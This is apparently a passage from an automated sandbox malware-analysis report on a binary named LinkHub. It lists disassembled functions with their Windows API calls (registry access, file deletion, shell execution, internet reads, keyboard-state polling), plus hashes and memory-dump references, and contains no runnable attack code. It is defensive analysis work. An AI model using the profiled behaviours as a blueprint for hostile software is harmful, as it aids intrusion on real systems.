                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                    • String ID:
                                                                    • API String ID: 272304278-0
                                                                    • Opcode ID: 09d3deae6264b13e1446e2b5ea66ba404786f557b3d786658b18dd9a8a07f582
                                                                    • Instruction ID: 5dee0cef268dcb0c808b9f79ba2369c68c44c5282f2d169a7ad9ec64102fe252
                                                                    • Opcode Fuzzy Hash: 09d3deae6264b13e1446e2b5ea66ba404786f557b3d786658b18dd9a8a07f582
                                                                    • Instruction Fuzzy Hash: EE014B31500205EFDB605FA4DC08BE97BB2FB48321F510165FA2AE22A0CF321E55AB21
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD21CC
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00CD21D8
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD21E1
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD21E9
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD21F2
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD21F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 7e5b382c5d494fd5427865ac9ee2026c4c9d6125eb9dfb2c1822678a96e2cd2b
                                                                    • Instruction ID: cc9ac550dd4ab6e5893948e1fff89c4074f0fb8fa05df80a77d9fdd5dbfafcc2
                                                                    • Opcode Fuzzy Hash: 7e5b382c5d494fd5427865ac9ee2026c4c9d6125eb9dfb2c1822678a96e2cd2b
                                                                    • Instruction Fuzzy Hash: 70E07D76104705BBD7011FE5EC0DA45BF7AFF597217508626F229C2670CB325461DB61
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CDCF99
                                                                    • _wcslen.LIBCMT ref: 00CDCFE0
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CDD047
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CDD075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                    • String ID: 0
                                                                    • API String ID: 1227352736-4108050209
                                                                    • Opcode ID: c091772262adefda0566a6d0e664942bcf9183b2bff7975c8405f56d1845cd91
                                                                    • Instruction ID: 09fa08c8f89888b66eb2a19e17a2f72ba09431941d0c2b798f80933152c93a3d
                                                                    • Opcode Fuzzy Hash: c091772262adefda0566a6d0e664942bcf9183b2bff7975c8405f56d1845cd91
                                                                    • Instruction Fuzzy Hash: 2E51D171A043019BD714AF64C885BABB7E8AF85314F040A2FFAA6D3391DB70DA45C752
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00CFB903
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                    • GetProcessId.KERNEL32(00000000), ref: 00CFB998
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFB9C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 146682121-1426351568
                                                                    • Opcode ID: f1e92bcda59d3e61cac6ac1b8f423cc9dbf773d2aca84958e4a6902d8948a89f
                                                                    • Instruction ID: e1398e6f235ba21a5ab87ea93944eca9350d80758f793764b8a131268313704f
                                                                    • Opcode Fuzzy Hash: f1e92bcda59d3e61cac6ac1b8f423cc9dbf773d2aca84958e4a6902d8948a89f
                                                                    • Instruction Fuzzy Hash: 76716B75A00219DFCB14EF64C494AADBBF5FF08310F048499E959AB391CB74EE45CB91
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD7B6D
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD7BA3
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD7BB4
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7C36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: a50e644df4af783edd617f3d1b026b2b0e792cf488810be8383a88c04002ac0d
                                                                    • Instruction ID: 11002e176ed7ec18cb411b6bfea631bd7d30af8e4a7a7bd8c808e4076862a99c
                                                                    • Opcode Fuzzy Hash: a50e644df4af783edd617f3d1b026b2b0e792cf488810be8383a88c04002ac0d
                                                                    • Instruction Fuzzy Hash: BD4171B1604304EFDB15DF64D885A9A7BB9EF84314F1481AEAA05DF305EBB1DA44CBA0
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D048D1
                                                                    • IsMenu.USER32(?), ref: 00D048E6
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D0492E
                                                                    • DrawMenuBar.USER32 ref: 00D04941
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: bf14aeb601d5ae06d3f69bb97f7326cad159ad6b93c40612edcde43d93c531b4
                                                                    • Instruction ID: 36698fd73afdc2c2bba9a4df5df3208e47c4f0d24345954276bb04a489f5dea0
                                                                    • Opcode Fuzzy Hash: bf14aeb601d5ae06d3f69bb97f7326cad159ad6b93c40612edcde43d93c531b4
                                                                    • Instruction Fuzzy Hash: 274119B5A01209AFDB10CF51E884EAA7BB9FF46324F088129EA5997390D730ED54CF60
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CD27B3
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CD27C6
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CD27F6
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2081771294-1403004172
                                                                    • Opcode ID: 7e0c7c9d86604ae9e1f7184a24bc5efac80acb6e31c4e4f9a47a9fe5c8f130b5
                                                                    • Instruction ID: 3b32c6162147562c20e06893f8fcc0dbd9b845ab6e2a8294097b9386b5816471
                                                                    • Opcode Fuzzy Hash: 7e0c7c9d86604ae9e1f7184a24bc5efac80acb6e31c4e4f9a47a9fe5c8f130b5
                                                                    • Instruction Fuzzy Hash: 45210772940104BFDB15ABA0DC49DFFBBB9DF55360F10812BF526972E1DB344D09A660
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D03A29
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00D03A30
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D03A45
                                                                    • DestroyWindow.USER32(?), ref: 00D03A4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: 89b44ffdc64a959fb61b99b080c29dd562d061431b49f65d1d475e965a198cd7
                                                                    • Instruction ID: e42d2ab8c29f6102cdd82b704ed2e470c57e60a09990b552d6b7add28df16d1e
                                                                    • Opcode Fuzzy Hash: 89b44ffdc64a959fb61b99b080c29dd562d061431b49f65d1d475e965a198cd7
                                                                    • Instruction Fuzzy Hash: 2D215871600309ABEF109FA4EC80FAB77ADEB49368F145219FA99D61E0C771CD519B70
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C9508E,00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002), ref: 00C950FD
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C95110
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00C9508E,00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000), ref: 00C95133
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 4fe4a39f8d5f138f90dbabe27f49631173ea0184655071f93ff5aee644b77d26
                                                                    • Instruction ID: 97090127cee0735b44662470e6d2461417e1935d043b507e2d5abd8339984319
                                                                    • Opcode Fuzzy Hash: 4fe4a39f8d5f138f90dbabe27f49631173ea0184655071f93ff5aee644b77d26
                                                                    • Instruction Fuzzy Hash: 49F04F35A00308BFDB119F94EC49BADBFB5EF08752F040065F909E22A0DF749A94DBA1
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32 ref: 00CCE785
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CCE797
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00CCE7BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                    • API String ID: 145871493-2590602151
                                                                    • Opcode ID: f4894f9ea93f5062769c11e7d72002eaca2c4dc5bf3714de9f255c158e13599a
                                                                    • Instruction ID: 7167191084395dfbe308dbae3b989f02666a4a24ae0ff483d52202bb64882ae2
                                                                    • Opcode Fuzzy Hash: f4894f9ea93f5062769c11e7d72002eaca2c4dc5bf3714de9f255c158e13599a
                                                                    • Instruction Fuzzy Hash: 8DF0E5719117219FD7326F608C48F6976296F12701F15059DF84AE2250DF70CE8487A5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7664A
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C7665C
• FreeLibrary.KERNEL32(00000000,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7666E
Memory Dump Source
• Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76610
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C76622
• FreeLibrary.KERNEL32(00000000,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76635
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE35C4
• DeleteFileW.KERNEL32(?), ref: 00CE3646
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CE365C
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE366D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE367F
Similarity
• API ID: File$Delete$Copy
APIs
• GetCurrentProcessId.KERNEL32 ref: 00CFAE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CFAE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CFAEC8
• CloseHandle.KERNEL32(?), ref: 00CFB09D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
APIs
  • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
  • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
  • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
  • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
  • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CFC5C3
• RegCloseKey.ADVAPI32(?,?), ref: 00CFC606
• RegCloseKey.ADVAPI32(00000000), ref: 00CFC613
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
APIs
  • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CDD7CD,?), ref: 00CDE714
  • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CDD7CD,?), ref: 00CDE72D
  • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
• lstrcmpiW.KERNEL32(?,?), ref: 00CDED8A
• MoveFileW.KERNEL32(?,?), ref: 00CDEDC3
• _wcslen.LIBCMT ref: 00CDEF02
• _wcslen.LIBCMT ref: 00CDEF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00CDEF67
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
APIs
• VariantInit.OLEAUT32(?), ref: 00CD9534
• VariantClear.OLEAUT32 ref: 00CD95A5
• VariantClear.OLEAUT32 ref: 00CD9604
• VariantClear.OLEAUT32(?), ref: 00CD9677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD96A2
Similarity
• API ID: Variant$Clear$ChangeInitType
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE95F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00CE961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE9677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE96A4
Similarity
• API ID: PrivateProfile$SectionWrite$String
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00CF999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00CF9A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF9A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00CF9A8F
• FreeLibrary.KERNEL32(00000000), ref: 00CF9AAF
  • Part of subcall function 00C8F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CE1A02,?,753CE610), ref: 00C8F9F1
  • Part of subcall function 00C8F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00CD0354,00000000,00000000,?,?,00CE1A02,?,753CE610,?,00CD0354), ref: 00C8FA18
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                    APIs
                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00D0766B
                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00D07682
                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00D076AB
                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00CEB5BE,00000000,00000000), ref: 00D076D0
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00D076FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MessageSendShow
                                                                    • String ID:
                                                                    • API String ID: 3688381893-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C719E1
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00CE4310
                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CE4367
                                                                    • TranslateMessage.USER32(?), ref: 00CE4390
                                                                    • DispatchMessageW.USER32(?), ref: 00CE439A
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE43AB
                                                                    Similarity
                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                    • String ID:
                                                                    • API String ID: 2256411358-0
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD2262
                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00CD230E
                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00CD2316
                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00CD2327
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00CD232F
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00CECC63,00000000), ref: 00CED97D
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00CED9B4
                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00CECC63,00000000), ref: 00CED9F9
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CECC63,00000000), ref: 00CEDA0D
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CECC63,00000000), ref: 00CEDA37
                                                                    Similarity
                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    • API String ID: 3191363074-0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D061E4
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D0623C
                                                                    • _wcslen.LIBCMT ref: 00D0624E
                                                                    • _wcslen.LIBCMT ref: 00D06259
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D062B5
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 763830540-0
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00CF13AE
                                                                    • GetForegroundWindow.USER32 ref: 00CF13C5
                                                                    • GetDC.USER32(00000000), ref: 00CF1401
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00CF140D
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00CF1445
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00CAD146
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CAD169
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CAD18F
                                                                    • _free.LIBCMT ref: 00CAD1A2
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CAD1B1
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(74DE2E40,?,?,00C9F64E,00CA3BD6,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3170
                                                                    • _free.LIBCMT ref: 00CA31A5
                                                                    • _free.LIBCMT ref: 00CA31CC
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA31D9
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA31E2
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?,?,00CD0C4E), ref: 00CD091B
